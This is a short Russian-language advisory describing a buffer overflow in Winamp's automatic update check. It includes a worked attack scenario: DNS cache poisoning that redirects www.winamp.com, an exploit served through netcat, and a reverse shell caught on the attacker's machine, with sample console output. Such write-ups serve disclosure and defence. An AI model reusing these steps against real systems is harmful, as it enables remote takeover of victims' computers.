Winamp по умолчанию устанавливается с опцией, которая проверяет при запуске наличие последней версии на
http://www.winamp.com и уведомляет пользователя о наличии возможного обновления. Если при этом получен чрезмерно большой ответ, произойдет переполнение буфера. Пример: Nameserver - 192.168.0.1 Attacker - 192.168.1.2 Victim (windows machine) - 192.168.0.2 

Хакер портит кэш DNS сервера: 
192.168.1.2: 
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2 
Жертва ресольвит www.winamp.com к машине атакующего. 
192.168.0.2: 
C:>nslookup www.winamp.com 
Server: z3.names.int 
Address: 192.168.0.1 
Name: www.winamp.com 
Аddress: 192.168.1.2

Атакующий запускает эксплоит: 
192.168.1.2: 
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80

На машине жертвы запускается Winamp и пытается найти обновление, происходит переполнение и выполняется код
атакующего: 

192.168.1.2: 
x@x:~$ nc -l -p 5555 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp.
C:>

Эксплоит

Оставить мнение